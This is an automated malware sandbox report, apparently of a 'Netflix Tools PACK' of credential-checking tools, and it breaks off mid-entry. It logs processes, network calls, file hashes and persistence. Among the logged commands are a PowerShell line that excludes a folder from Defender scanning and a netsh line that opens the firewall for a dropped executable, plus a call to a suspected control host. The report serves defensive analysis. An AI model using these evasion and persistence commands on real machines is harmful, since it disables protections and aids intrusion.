"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,3742604189501664572,12367309575954001783,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 112.208.253.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.104.205.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cracked.to | udp |
| US | 172.67.73.245:443 | cracked.to | tcp |
| US | 172.67.73.245:443 | cracked.to | tcp |
| US | 8.8.8.8:53 | 245.73.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.255.255.239.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cracked.io | udp |
| US | 104.26.11.133:443 | cracked.io | tcp |
| US | 8.8.8.8:53 | static.cracked.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 133.11.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cracked.to | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 113.132.60.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
Files
memory/4380-134-0x00000000005D0000-0x0000000000622000-memory.dmp
memory/4380-135-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/4380-136-0x0000000004FB0000-0x0000000004FCC000-memory.dmp
memory/4380-137-0x0000000005290000-0x0000000005322000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5a9f76dde5876d055fc0a4a821de6d02 |
| SHA1 | 3cb30f2ff875cff6a4e4be0c7506254e076ad4df |
| SHA256 | 323204c96cf3ed35bb893c2f20a444cd0c7aa0b44749174b7b22ab351b2edf1a |
| SHA512 | b805309fbbc622f2e47c9d4397662713b37879d0ea0602675c0894e655b9dcd34d483a02c6bdb73b5c6ce084ca7523e038104bce428a5bc7be3569c0d18b9091 |
\??\pipe\LOCAL\crashpad_4224_MDUJLRDZKMSMKCRJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | e5e3377341056643b0494b6842c0b544 |
| SHA1 | d53fd8e256ec9d5cef8ef5387872e544a2df9108 |
| SHA256 | e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25 |
| SHA512 | 83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 173029b86aed17405a5340578d691b55 |
| SHA1 | 28742af7301f93d45f0e7c994ba9a1cac2aa7387 |
| SHA256 | e1e40caa21b60d085685cbcc0cd67ca36de82a69ba3a74da17c9472236190fb0 |
| SHA512 | 132ef460a878e220bff6ea2ef88b3c38e0ea54e11b36f5b0a98b344a7a55f876af61bc2de9cdf2e3f74124dec5a140a58ecd523a2e791ffa09aea81b11b35c13 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 3922931a21a66290ecb769f2d79cc417 |
| SHA1 | d72bc5af3b2da078125ce71512249f67765624c3 |
| SHA256 | 0eb33cdbc3b30f2dd68d3e4de912b61c6f29f3ddbf17b8e83948e9243763b8d4 |
| SHA512 | e4b1c22b64afa2120c2ae1385374747b04ea4b509fef1a27384755d57cfd4a86008cbf9af7095a1955c9934148b38cf7aa32b036d08702cbaa0ec9f5f59c3987 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
| MD5 | dd4e21e35a19e7aacb6697fdb23db092 |
| SHA1 | d3353100527580b1fa646d1e7501aa18308797f6 |
| SHA256 | 86ee350dbcf8332e97129f3e576409647e2cd098665d66f54a296a3895305002 |
| SHA512 | e156ffaee8c0c51a03ecdeff51b844af4f23c49c20d9ef98580b87b4c88dd1cc423715f16c9c155fcd5f2fbd8f4fb725ee14ceb264575ab2943b58bfe8b5d31a |
memory/4380-269-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 2e29b3bb890de386fb9c984d6b5d8ae2 |
| SHA1 | 07ff20bec3b91057f54f610ad1d532ddc6f01047 |
| SHA256 | 03db9e97c61c766e7346ef15cfd67a6232e7fd521b7b3d453c44e47af7f8a980 |
| SHA512 | 4ac4ebc5d29f6f1c1ba982a2578fb178a94cc8b52d1735f3e61acc62a754550a6c86292a5395201c3da9929cd119a5093e38376b7d640f6b2e8dde4154543588 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3ab5566f182aad6df9d49665e71036fb |
| SHA1 | d03c31ce9211743e7e3a0dfb2585f642d01b1a57 |
| SHA256 | 15f2ad8a040da2a43ecf2a4c14f364a2a0cf23a8c83d0322aa48de86402bcafb |
| SHA512 | 391c7a6aa51d7be1c9bccc8e5d7a4a5376404fda20351d94dd8db756b23d550a1be49cbd063daeb1987dbae2dc89b268d04b2d10f828b0a5744b9a00c9c4ca7f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1b021c8e6043b7870613007a5e152c3e |
| SHA1 | 914cfb90187958d67eb8875aba60b3b06605899d |
| SHA256 | 8a36ede68bb8a7b72976a8d3b3e1d937ad2a5273f6daf2272c8cd54e19e1c3d6 |
| SHA512 | 729d30c08af35167d60fc28edbc864116357615aa60aa7be9ddd3e43fac7c1d701b060154db756b7877014a57e4dc132fb4f025dceb02358338a8a6a50f0f564 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | b359167b3568d1b4953adefdef0deb24 |
| SHA1 | 98405d3ec52edeed62f8a42bfe766ecf395a95b6 |
| SHA256 | 177289a899357233597b059fde47b7e54aba35ca95e2a2201fd8d3ca68273578 |
| SHA512 | 28efc3e9bb0350c2229ffdfc0578c0ebc8276405849480c1762c75d616998f6ff654f7ffde3cf0676b62b583b5ec207e514040de1a809b465bb9e734e29c96b9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0e123655254f063f0b3c12ed15a12df6 |
| SHA1 | 3c3caebf7c7894671668394425d73b670a50fdbd |
| SHA256 | 7ba2d6f360182f36dfddacc6263280d397b4dfc9c6716a40c3f5020dfbf63858 |
| SHA512 | 8649e7ef4dc4e0bc6b320ac7b8025555a6cf37b6d1374a3601be89f8066ca60bae784642cdb1d448f00bd96c69098bb381c4d09871a609b499fa9b53abe9a332 |
Analysis: behavioral32
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
41s
Max time network
51s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\RubiconSoft.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\RubiconSoft.exe"
Network
| Country | Destination | Domain | Proto |
| IE | 20.50.73.9:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| GB | 96.16.110.41:443 | tcp | |
| US | 93.184.221.240:80 | tcp |
Files
memory/4016-133-0x0000000000CE0000-0x0000000000D06000-memory.dmp
memory/4016-134-0x0000000005950000-0x0000000005960000-memory.dmp
memory/4016-135-0x0000000003230000-0x0000000003250000-memory.dmp
memory/4016-136-0x0000000005950000-0x0000000005960000-memory.dmp
memory/4016-137-0x0000000005940000-0x0000000005948000-memory.dmp
memory/4016-138-0x0000000005E20000-0x0000000005E58000-memory.dmp
memory/4016-139-0x0000000005DE0000-0x0000000005DEE000-memory.dmp
memory/4016-140-0x0000000005950000-0x0000000005960000-memory.dmp
memory/4016-141-0x0000000005950000-0x0000000005960000-memory.dmp
memory/4016-142-0x0000000005950000-0x0000000005960000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
33s
Max time network
32s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
Files
memory/4548-133-0x0000000000500000-0x0000000000514000-memory.dmp
memory/4548-134-0x00000000053F0000-0x0000000005994000-memory.dmp
memory/4548-135-0x0000000004E40000-0x0000000004ED2000-memory.dmp
memory/4548-136-0x0000000004D90000-0x0000000004D9A000-memory.dmp
memory/4548-137-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/4548-138-0x0000000005330000-0x00000000053AE000-memory.dmp
memory/4548-139-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/5080-140-0x0000000002B10000-0x0000000002B46000-memory.dmp
memory/5080-141-0x0000000005870000-0x0000000005E98000-memory.dmp
memory/5080-142-0x0000000005590000-0x00000000055B2000-memory.dmp
memory/5080-143-0x00000000056B0000-0x0000000005716000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_in5nulz3.fpz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5080-149-0x00000000057D0000-0x0000000005836000-memory.dmp
memory/5080-154-0x0000000005230000-0x0000000005240000-memory.dmp
memory/5080-155-0x0000000005230000-0x0000000005240000-memory.dmp
memory/5080-156-0x0000000006460000-0x000000000647E000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4548-178-0x0000000006170000-0x00000000061E6000-memory.dmp
memory/4548-179-0x0000000006150000-0x000000000616E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3796-194-0x0000000000840000-0x0000000000852000-memory.dmp
memory/5080-195-0x0000000007610000-0x0000000007642000-memory.dmp
memory/5080-196-0x000000006F960000-0x000000006F9AC000-memory.dmp
memory/5080-206-0x00000000075D0000-0x00000000075EE000-memory.dmp
memory/5080-207-0x0000000007DB0000-0x000000000842A000-memory.dmp
memory/5080-208-0x0000000007760000-0x000000000777A000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3796-210-0x00000000051B0000-0x00000000051C0000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/5080-212-0x000000007EF50000-0x000000007EF60000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/5080-214-0x0000000005230000-0x0000000005240000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/5080-216-0x00000000077D0000-0x00000000077DA000-memory.dmp
memory/5096-217-0x0000000000600000-0x0000000000612000-memory.dmp
memory/5080-220-0x00000000079E0000-0x0000000007A76000-memory.dmp
memory/5096-221-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/5080-222-0x0000000007990000-0x000000000799E000-memory.dmp
memory/5080-223-0x0000000007AA0000-0x0000000007ABA000-memory.dmp
memory/5080-224-0x0000000007A80000-0x0000000007A88000-memory.dmp
memory/3796-227-0x00000000051B0000-0x00000000051C0000-memory.dmp
memory/5096-228-0x0000000004E80000-0x0000000004E90000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
30s
Max time network
35s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\460557edf4b4cbfb08eadcebcbd28364.exe | C:\Windows\winconfig.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\460557edf4b4cbfb08eadcebcbd28364.exe | C:\Windows\winconfig.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winconfig.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2178924671-3779044592-2825503497-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\460557edf4b4cbfb08eadcebcbd28364 = "\"C:\\Windows\\winconfig.exe\" .." | C:\Windows\winconfig.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\460557edf4b4cbfb08eadcebcbd28364 = "\"C:\\Windows\\winconfig.exe\" .." | C:\Windows\winconfig.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winconfig.exe | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\winconfig.exe | N/A |
| Token: 33 | N/A | C:\Windows\winconfig.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\winconfig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 648 wrote to memory of 1396 | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | C:\Windows\winconfig.exe |
| PID 648 wrote to memory of 1396 | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | C:\Windows\winconfig.exe |
| PID 648 wrote to memory of 1396 | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe | C:\Windows\winconfig.exe |
| PID 1396 wrote to memory of 1648 | N/A | C:\Windows\winconfig.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 1396 wrote to memory of 1648 | N/A | C:\Windows\winconfig.exe | C:\Windows\SysWOW64\netsh.exe |
| PID 1396 wrote to memory of 1648 | N/A | C:\Windows\winconfig.exe | C:\Windows\SysWOW64\netsh.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\gfsys.exe"
C:\Windows\winconfig.exe
"C:\Windows\winconfig.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\winconfig.exe" "winconfig.exe" ENABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hccr.sytes.net | udp |
| US | 13.89.179.8:443 | tcp |
Files
memory/648-133-0x0000000000650000-0x00000000006C0000-memory.dmp
memory/648-134-0x0000000005060000-0x00000000050FC000-memory.dmp
memory/648-135-0x00000000056B0000-0x0000000005C54000-memory.dmp
memory/648-136-0x00000000051A0000-0x0000000005232000-memory.dmp
memory/648-137-0x0000000005110000-0x000000000511A000-memory.dmp
memory/648-138-0x0000000005330000-0x0000000005386000-memory.dmp
memory/648-139-0x00000000053B0000-0x00000000053C0000-memory.dmp
memory/648-140-0x00000000053B0000-0x00000000053C0000-memory.dmp
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
C:\Windows\winconfig.exe
| MD5 | 19f1e1913d37b8698e4fc1bb350d754a |
| SHA1 | 922909897e1e2aa431bbe7974bb99849d1c18ad3 |
| SHA256 | 9d9c257a3f669babda5bbbb3d143a7575f17bee0425f90f80f2ef7bd807bfbc5 |
| SHA512 | d178276ac46efd2614d94e2e1dd91b01aae7b565326b1dd831b47cebdbe292bf9df3cbca7bffbb34a826a138b681f2d4bf5f76dc54f9cca4b74f40f8a0dbbec1 |
memory/1396-153-0x00000000052E0000-0x00000000052F0000-memory.dmp
memory/1396-154-0x00000000052E0000-0x00000000052F0000-memory.dmp
memory/1396-156-0x00000000052E0000-0x00000000052F0000-memory.dmp
memory/1396-157-0x00000000052E0000-0x00000000052F0000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
38s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\chromedriver.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\chromedriver.exe"
Network
| Country | Destination | Domain | Proto |
| US | 13.85.23.86:443 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.121.24.20.in-addr.arpa | udp |
| US | 13.85.23.86:443 | tcp | |
| US | 2.18.121.75:80 | tcp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
34s
Max time network
37s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
